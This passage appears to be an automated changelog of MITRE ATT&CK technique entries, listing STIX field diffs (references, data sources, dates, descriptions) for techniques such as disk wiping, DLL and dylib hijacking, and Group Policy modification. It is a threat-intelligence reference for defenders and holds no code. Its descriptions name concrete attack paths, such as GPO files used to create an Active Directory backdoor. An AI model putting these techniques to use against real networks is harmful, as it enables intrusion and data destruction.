external_references[6]['url'] | https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637 | https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN
external_references[7]['source_name'] | Microsoft Dynamic-Link Library Redirection | Microsoft Manifests
external_references[7]['description'] | Microsoft. (2018, May 31). Dynamic-Link Library Redirection. Retrieved March 13, 2020. | Microsoft. (n.d.). Manifests. Retrieved December 5, 2014.
external_references[7]['url'] | https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN | https://msdn.microsoft.com/en-US/library/aa375365
external_references[8]['source_name'] | Microsoft Manifests | FireEye DLL Search Order Hijacking
external_references[8]['description'] | Microsoft. (n.d.). Manifests. Retrieved December 5, 2014. | Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020.
external_references[8]['url'] | https://msdn.microsoft.com/en-US/library/aa375365 | https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html
iterable_item_added
STIX Field | New Value
x_mitre_data_sources | Module: Module Load
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'FireEye DLL Search Order Hijacking', 'description': 'Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020.', 'url': 'https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html'}
x_mitre_data_sources | Module: Module Load

[T1574.002] Hijack Execution Flow: DLL Side-Loading

Current version: 2.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-05-05 04:07:48.912000+00:00 | 2023-03-30 21:01:47.241000+00:00
x_mitre_data_sources[0] | File: File Modification | File: File Creation
x_mitre_data_sources[1] | File: File Creation | Process: Process Creation
x_mitre_data_sources[3] | Process: Process Creation | File: File Modification
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/641.html', 'external_id': 'CAPEC-641'}

[T1039] Data from Network Shared Drive

Current version: 1.3

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-06-16 13:08:03.209000+00:00 | 2023-03-30 21:01:35.611000+00:00
x_mitre_data_sources[0] | Network Share: Network Share Access | Command: Command Execution
x_mitre_data_sources[1] | Network Traffic: Network Connection Creation | Network Share: Network Share Access
x_mitre_data_sources[2] | Command: Command Execution | Network Traffic: Network Traffic Content
x_mitre_data_sources[4] | Network Traffic: Network Traffic Content | Network Traffic: Network Connection Creation
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/639.html', 'external_id': 'CAPEC-639'}

[T1078.001] Valid Accounts: Default Accounts

Current version: 1.2

Details
dictionary_item_added
STIX Field | New Value
x_mitre_attack_spec_version | 3.1.0
external_references | Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019.
dictionary_item_removed
STIX Field | Old value
external_references | CAPEC-70
values_changed
STIX Field | Old value | New Value
modified | 2021-04-05 20:14:26.846000+00:00 | 2023-03-30 21:01:44.382000+00:00
external_references[1]['source_name'] | capec | Microsoft Local Accounts Feb 2019
external_references[1]['url'] | https://capec.mitre.org/data/definitions/70.html | https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts
external_references[2]['source_name'] | Microsoft Local Accounts Feb 2019 | AWS Root User
external_references[2]['description'] | Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019. | Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021.
external_references[2]['url'] | https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts | https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html
external_references[3]['source_name'] | AWS Root User | Threat Matrix for Kubernetes
external_references[3]['description'] | Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021. | Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.
external_references[3]['url'] | https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html | https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
external_references[4]['source_name'] | Threat Matrix for Kubernetes | Metasploit SSH Module
external_references[4]['description'] | Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021. | undefined. (n.d.). Retrieved April 12, 2019.
external_references[4]['url'] | https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ | https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'Metasploit SSH Module', 'description': 'undefined. (n.d.). Retrieved April 12, 2019.', 'url': 'https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh'}

[T1498.001] Network Denial of Service: Direct Network Flood

Current version: 1.3

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-19 23:28:52.908000+00:00 | 2023-03-30 21:01:53.685000+00:00
x_mitre_data_sources[0] | Network Traffic: Network Traffic Flow | Sensor Health: Host Status
x_mitre_data_sources[1] | Sensor Health: Host Status | Network Traffic: Network Traffic Flow
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/125.html', 'external_id': 'CAPEC-125'}
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/486.html', 'external_id': 'CAPEC-486'}

[T1561.001] Disk Wipe: Disk Content Wipe

Current version: 1.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-07-28 18:55:35.989000+00:00 | 2023-04-12 23:42:59.868000+00:00
description | Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources. Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files. To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware) | Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources. Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files. To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Driver: Driver Load | Drive: Drive Modification
x_mitre_data_sources[1] | Drive: Drive Modification | Command: Command Execution
x_mitre_data_sources[2] | Drive: Drive Access | Driver: Driver Load
x_mitre_data_sources[4] | Command: Command Execution | Drive: Drive Access
x_mitre_detection | Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity. | Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity. For network infrastructure devices, collect AAA logging to monitor for `erase` commands that delete critical configuration files.

[T1090.004] Proxy: Domain Fronting

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
external_references | | David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. Retrieved November 20, 2017.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-481 |
values_changed
STIX Field | Old value | New Value
modified | 2020-09-16 19:30:54.226000+00:00 | 2023-03-30 21:01:52.356000+00:00
external_references[1]['source_name'] | capec | Fifield Blocking Resistent Communication through domain fronting 2015
external_references[1]['url'] | https://capec.mitre.org/data/definitions/481.html | http://www.icir.org/vern/papers/meek-PETS-2015.pdf
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Fifield Blocking Resistent Communication through domain fronting 2015', 'description': 'David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. Retrieved November 20, 2017.', 'url': 'http://www.icir.org/vern/papers/meek-PETS-2015.pdf'} |

[T1583.001] Acquire Infrastructure: Domains

Current version: 1.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-18 19:21:38.441000+00:00 | 2023-03-30 21:01:37.379000+00:00
external_references[5]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf | https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
external_references[12]['url'] | https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/ | https://web.archive.org/web/20171223000420/https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/
external_references[13]['url'] | https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/ | https://web.archive.org/web/20220527112908/https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources | | Domain Name: Domain Registration
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/630.html', 'external_id': 'CAPEC-630'} |
x_mitre_data_sources | Domain Name: Domain Registration |

[T1574.004] Hijack Execution Flow: Dylib Hijacking

Current version: 2.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-05-05 04:08:30.203000+00:00 | 2023-03-30 21:01:39.601000+00:00
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/471.html', 'external_id': 'CAPEC-471'} |

[T1574.006] Hijack Execution Flow: Dynamic Linker Hijacking

Current version: 2.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
external_references | | Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved June 15, 2020.
external_references | | The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved January 31, 2020.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-13 |
external_references | CAPEC-640 |
values_changed
STIX Field | Old value | New Value
modified | 2021-04-27 19:55:18.453000+00:00 | 2023-03-30 21:01:40.146000+00:00
external_references[1]['source_name'] | capec | Man LD.SO
external_references[1]['url'] | https://capec.mitre.org/data/definitions/13.html | https://www.man7.org/linux/man-pages/man8/ld.so.8.html
external_references[2]['source_name'] | capec | TLDP Shared Libraries
external_references[2]['url'] | https://capec.mitre.org/data/definitions/640.html | https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
external_references[3]['source_name'] | Man LD.SO | Apple Doco Archive Dynamic Libraries
external_references[3]['description'] | Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved June 15, 2020. | Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved March 24, 2021.
external_references[3]['url'] | https://www.man7.org/linux/man-pages/man8/ld.so.8.html | https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html
external_references[4]['source_name'] | TLDP Shared Libraries | Baeldung LD_PRELOAD
external_references[4]['description'] | The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved January 31, 2020. | baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved March 24, 2021.
external_references[4]['url'] | https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html | https://www.baeldung.com/linux/ld_preload-trick-what-is
external_references[5]['source_name'] | Apple Doco Archive Dynamic Libraries | Code Injection on Linux and macOS
external_references[5]['description'] | Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved March 24, 2021. | Itamar Turner-Trauring. (2017, April 18). “This will only hurt for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved December 20, 2017.
external_references[5]['url'] | https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html | https://www.datawire.io/code-injection-on-linux-and-macos/
external_references[6]['source_name'] | Baeldung LD_PRELOAD | Uninformed Needle
external_references[6]['description'] | baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved March 24, 2021. | skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.
external_references[6]['url'] | https://www.baeldung.com/linux/ld_preload-trick-what-is | http://hick.org/code/skape/papers/needle.txt
external_references[7]['source_name'] | Code Injection on Linux and macOS | Phrack halfdead 1997
external_references[7]['description'] | Itamar Turner-Trauring. (2017, April 18). “This will only hurt for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved December 20, 2017. | halflife. (1997, September 1). Shared Library Redirection Techniques. Retrieved December 20, 2017.
external_references[7]['url'] | https://www.datawire.io/code-injection-on-linux-and-macos/ | http://phrack.org/issues/51/8.html
external_references[8]['source_name'] | Uninformed Needle | Brown Exploiting Linkers
external_references[8]['description'] | skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017. | Tim Brown. (2011, June 29). Breaking the links: Exploiting the linker. Retrieved March 29, 2021.
external_references[8]['url'] | http://hick.org/code/skape/papers/needle.txt | http://www.nth-dimension.org.uk/pub/BTL.pdf
external_references[9]['source_name'] | Phrack halfdead 1997 | TheEvilBit DYLD_INSERT_LIBRARIES
external_references[9]['description'] | halflife. (1997, September 1). Shared Library Redirection Techniques. Retrieved December 20, 2017. | Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX. Retrieved March 26, 2020.
external_references[9]['url'] | http://phrack.org/issues/51/8.html | https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/
external_references[10]['source_name'] | Brown Exploiting Linkers | Timac DYLD_INSERT_LIBRARIES
external_references[10]['description'] | Tim Brown. (2011, June 29). Breaking the links: Exploiting the linker. Retrieved March 29, 2021. | Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. Retrieved March 26, 2020.
external_references[10]['url'] | http://www.nth-dimension.org.uk/pub/BTL.pdf | https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/
external_references[11]['source_name'] | TheEvilBit DYLD_INSERT_LIBRARIES | Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass
external_references[11]['description'] | Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX. Retrieved March 26, 2020. | Jon Gabilondo. (2019, September 22). How to Inject Code into Mach-O Apps. Part II.. Retrieved March 24, 2021.
external_references[11]['url'] | https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/ | https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191
x_mitre_data_sources[0] | Module: Module Load | Command: Command Execution
x_mitre_data_sources[1] | Command: Command Execution | File: File Modification
x_mitre_data_sources[2] | Process: Process Creation | File: File Creation
x_mitre_data_sources[3] | File: File Creation | Module: Module Load
x_mitre_data_sources[4] | File: File Modification | Process: Process Creation
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Timac DYLD_INSERT_LIBRARIES', 'description': 'Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. Retrieved March 26, 2020.', 'url': 'https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/'} |
external_references | {'source_name': 'Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass', 'description': 'Jon Gabilondo. (2019, September 22). How to Inject Code into Mach-O Apps. Part II.. Retrieved March 24, 2021.', 'url': 'https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191'} |

[T1499] Endpoint Denial of Service

Current version: 1.1

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-12 14:48:40.313000+00:00 | 2023-03-30 21:01:44.038000+00:00
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/227.html', 'external_id': 'CAPEC-227'} |
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/131.html', 'external_id': 'CAPEC-131'} |
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/130.html', 'external_id': 'CAPEC-130'} |
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/125.html', 'external_id': 'CAPEC-125'} |

[T1133] External Remote Services

Current version: 2.4

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-06-16 19:15:22.221000+00:00 | 2023-03-30 21:01:36.318000+00:00
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources | | Network Traffic: Network Traffic Content
x_mitre_data_sources | | Network Traffic: Network Connection Creation
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/555.html', 'external_id': 'CAPEC-555'} |
x_mitre_data_sources | Network Traffic: Network Connection Creation |
x_mitre_data_sources | Network Traffic: Network Traffic Content |

[T1083] File and Directory Discovery

Current version: 1.5

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-09-06 21:55:41.262000+00:00 | 2023-03-30 21:01:42.631000+00:00
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources | | Process: OS API Execution
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/127.html', 'external_id': 'CAPEC-127'} |
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/497.html', 'external_id': 'CAPEC-497'} |
x_mitre_data_sources | Process: OS API Execution |

[T1056.002] Input Capture: GUI Input Capture

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
external_references | | Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits Mackeeper. Retrieved July 3, 2017.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-659 |
values_changed
STIX Field | Old value | New Value
modified | 2022-03-08 21:05:20.136000+00:00 | 2023-03-30 21:01:48.279000+00:00
external_references[1]['source_name'] | capec | OSX Malware Exploits MacKeeper
external_references[1]['url'] | https://capec.mitre.org/data/definitions/659.html | https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html
external_references[2]['source_name'] | OSX Malware Exploits MacKeeper | LogRhythm Do You Trust Oct 2014
external_references[2]['description'] | Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits Mackeeper. Retrieved July 3, 2017. | Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved December 17, 2018.
external_references[2]['url'] | https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html | https://logrhythm.com/blog/do-you-trust-your-computer/
external_references[3]['source_name'] | LogRhythm Do You Trust Oct 2014 | OSX Keydnap malware
external_references[3]['description'] | Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved December 17, 2018. | Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.
external_references[3]['url'] | https://logrhythm.com/blog/do-you-trust-your-computer/ | https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
external_references[4]['source_name'] | OSX Keydnap malware | Spoofing credential dialogs
external_references[4]['description'] | Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017. | Johann Rehberger. (2021, April 18). Spoofing credential dialogs on macOS Linux and Windows. Retrieved August 19, 2021.
external_references[4]['url'] | https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ | https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
external_references[5]['source_name'] | Spoofing credential dialogs | Enigma Phishing for Credentials Jan 2015
external_references[5]['description'] | Johann Rehberger. (2021, April 18). Spoofing credential dialogs on macOS Linux and Windows. Retrieved August 19, 2021. | Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.
external_references[5]['url'] | https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/ | https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources | | Script: Script Execution
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Enigma Phishing for Credentials Jan 2015', 'description': 'Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.', 'url': 'https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/'} |
x_mitre_data_sources | Script: Script Execution |

[T1484.001] Domain Policy Modification: Group Policy Modification

Current version: 1.0


Old Description
Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path <code>\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\</code>.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain. Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs) For example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <code><GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml</code>.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code><GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)

New Description
Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain. Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs) For example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <code><GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml</code>.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code><GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)
Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-02-09 15:52:24.315000+00:00 | 2023-01-06 12:44:15.707000+00:00
description | Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain. Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs) For example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right) | Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain. Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs) For example, publicly available scripts such as New-GPOImmediateTask can 